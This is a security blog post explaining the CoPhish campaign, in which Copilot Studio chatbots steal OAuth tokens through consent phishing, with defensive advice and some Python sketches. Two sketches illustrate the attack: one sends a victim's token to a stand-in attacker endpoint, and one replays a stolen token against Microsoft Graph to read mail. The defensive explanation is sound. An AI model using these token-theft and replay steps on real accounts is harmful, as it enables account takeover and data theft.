
How AI-Powered Phishing Attacks Are Exploiting Copilot Studio: What You Need to Know

AI-Powered Phishing Tactics Redefine the Threat Landscape

Phishing attacks have evolved and now leverage AI platforms to bypass traditional security measures. A recent campaign, dubbed CoPhish, illustrates this shift: by weaponizing Microsoft Copilot Studio, attackers build convincing phishing lures that steal OAuth tokens and gain access to Microsoft Entra ID accounts. The tactic exploits a trusted productivity tool in unexpected ways, making it harder for even experienced users to spot the deception.

Inside the CoPhish Attack

Researchers at Datadog Security Labs uncovered how CoPhish operates. Criminals use Copilot Studio’s AI agents to deploy malicious chatbots, which they host on authentic Microsoft domains. This approach disguises classic OAuth consent scams, allowing them to slip past both technical defenses and user suspicion.

  • Malicious Agents: Attackers spin up chatbots using trial licenses and their own or compromised tenants.

  • Backdoored Authentication: Login workflows are altered to send OAuth tokens to the attacker as soon as a user consents.

  • Trusted Domains: Phishing links appear genuine, leveraging Microsoft’s official infrastructure to instill trust.
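The "backdoored authentication" step above can be sketched in outline. This is a minimal illustration, not the actual Copilot Studio configuration: the attacker endpoint and payload shape are hypothetical, and in the real campaign the agent's login topic would forward the token through a built-in HTTP action rather than Python code.

```python
# Minimal sketch of the token-exfiltration step in a backdoored login flow.
# The endpoint and field names below are hypothetical.

ATTACKER_ENDPOINT = "https://attacker.example/collect"  # hypothetical

def build_exfil_request(oauth_token: str) -> dict:
    """Package a freshly granted OAuth token as the HTTP POST the
    malicious agent would silently send once the user consents."""
    return {
        "method": "POST",
        "url": ATTACKER_ENDPOINT,
        "json": {"token": oauth_token},
    }

req = build_exfil_request("sample-token")
print(req["url"])  # the attacker-controlled collection endpoint
```

The key point is that nothing in this exchange is visible to the victim: consent completes normally, and the token leaves via a background request.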

Step-by-Step: How Victims Are Targeted

When users click a phishing link, they encounter a familiar Copilot Studio interface and a prompt to log in. By authenticating and approving the consent prompt, they inadvertently grant the attacker's application access to data such as email or calendars, depending on their account privileges. The OAuth token is then quietly transmitted to the attacker, often via Microsoft IP addresses, making detection even more challenging.

  • Internal Users: The application requests modest permissions, lowering suspicion.

  • Privileged Users: Broader, potentially admin-level permissions may be sought, increasing risk.

With the stolen token, attackers can impersonate users, siphon off sensitive data, or propagate further phishing attempts without alerting victims.
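To make the impact concrete, here is a hedged sketch of how a stolen token could be replayed against Microsoft Graph. `/v1.0/me/messages` is Graph's standard mailbox-listing endpoint; the request is only constructed here, not sent.

```python
# Sketch: replaying a stolen OAuth access token against Microsoft Graph.
# The request is built but deliberately not sent.

GRAPH_MESSAGES_URL = "https://graph.microsoft.com/v1.0/me/messages"

def build_replay_request(stolen_token: str) -> tuple[str, dict]:
    """Return the URL and headers for reading the victim's mailbox.
    Graph accepts the token as a standard OAuth 2.0 Bearer credential,
    so the request looks like ordinary application traffic."""
    headers = {
        "Authorization": f"Bearer {stolen_token}",
        "Accept": "application/json",
    }
    return GRAPH_MESSAGES_URL, headers

url, headers = build_replay_request("stolen-token-value")
print(headers["Authorization"])  # "Bearer stolen-token-value"
```

Because the token was issued through a legitimate consent flow, no password is needed and no sign-in alert fires: this is why token theft is so much quieter than credential theft.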

Gaps in Microsoft’s Security Controls

Microsoft has tightened its OAuth consent policies, for example by restricting user consent by default and requiring admin approval for risky permissions. Yet gaps remain:

  • Regular users can still approve certain internal apps for moderate permissions.

  • High-level admin roles have the authority to grant extensive permissions across apps.

  • Recent policy changes help, but do not fully protect privileged accounts from exploitation.
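One way to check the first gap is to inspect the tenant's authorization policy in Microsoft Graph: the `permissionGrantPoliciesAssignedToDefaultUserRole` field under `defaultUserRolePermissions` lists which consent grants ordinary users may approve themselves. The sketch below only evaluates an already-fetched policy object; retrieving it requires an authenticated Graph client, which is out of scope here, and the exact payload shape should be verified against current Graph documentation.

```python
# Sketch: flag a tenant where regular users can still self-consent to apps.
# The input mirrors the assumed shape of GET /policies/authorizationPolicy
# in Microsoft Graph; fetching it needs an authenticated client (not shown).

def users_can_self_consent(authorization_policy: dict) -> bool:
    """True if any permission-grant policy is assigned to the default
    user role, i.e. non-admins may approve some app consent requests."""
    perms = authorization_policy.get("defaultUserRolePermissions", {})
    grant_policies = perms.get(
        "permissionGrantPoliciesAssignedToDefaultUserRole", [])
    return len(grant_policies) > 0

# Example payload resembling a tenant still on the legacy default:
sample_policy = {
    "defaultUserRolePermissions": {
        "permissionGrantPoliciesAssignedToDefaultUserRole": [
            "ManagePermissionGrantsForSelf.microsoft-user-default-legacy"
        ]
    }
}
print(users_can_self_consent(sample_policy))  # True
```

A tenant that returns an empty list here forces all app consent through admin review, closing the self-service path CoPhish relies on for internal users.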

The flexibility of low-code platforms like Copilot Studio, combined with integrated identity features, allows attackers to quickly craft new, evasive phishing agents. This agility outpaces many conventional security defenses, exposing organizations to fresh risks.

Protecting Your Organization Against AI-Driven Phishing

To counter these advanced threats, adopting a layered defense strategy is critical:

  • Enforce Custom Consent Policies: Strengthen controls beyond Microsoft defaults to tightly manage app permissions and approvals.

  • Restrict App Registrations: Limit users' ability to register new OAuth apps unless absolutely necessary.

  • Monitor Entra ID Logs: Actively track for abnormal app consents, Copilot Studio activities, and suspicious logins.

  • Ongoing User Education: Inform both end users and admins about AI-powered phishing and how to recognize risky OAuth consent screens.
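For the log-monitoring recommendation above, a starting point is querying Entra ID audit events for consent grants. The sketch below builds a Microsoft Graph query URL for the "Consent to application" audit activity; running it would require an authenticated client with audit-log read permissions (not shown), and the filter fields should be checked against current Graph documentation.

```python
from urllib.parse import quote

# Sketch: build a Microsoft Graph query for recent app-consent audit events.
# "Consent to application" is the Entra ID audit activity recorded when a
# user or admin approves an OAuth consent prompt. Executing the query needs
# an authenticated Graph client (not shown).

GRAPH_AUDIT_URL = "https://graph.microsoft.com/v1.0/auditLogs/directoryAudits"

def consent_audit_query(since_iso: str) -> str:
    """Return a Graph URL filtering for consent grants after a timestamp."""
    flt = ("activityDisplayName eq 'Consent to application' "
           f"and activityDateTime ge {since_iso}")
    return f"{GRAPH_AUDIT_URL}?$filter={quote(flt)}"

print(consent_audit_query("2025-10-01T00:00:00Z"))
```

Reviewing these events regularly, especially grants to newly registered or unfamiliar applications, is one of the few ways to catch a consent-phishing compromise after the fact.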

Adapting to an Evolving Threat

CoPhish highlights the double-edged nature of AI and low-code solutions in the workplace. While these tools boost productivity, they also expand the attack surface in unforeseen ways. Security teams must adapt quickly, tighten identity controls, and foster a culture of awareness to stay ahead of increasingly sophisticated phishing campaigns. Ultimately, robust policies and continuous vigilance are now indispensable for cloud security.

Source: Cyber Security News

Joshua Berkowitz October 27, 2025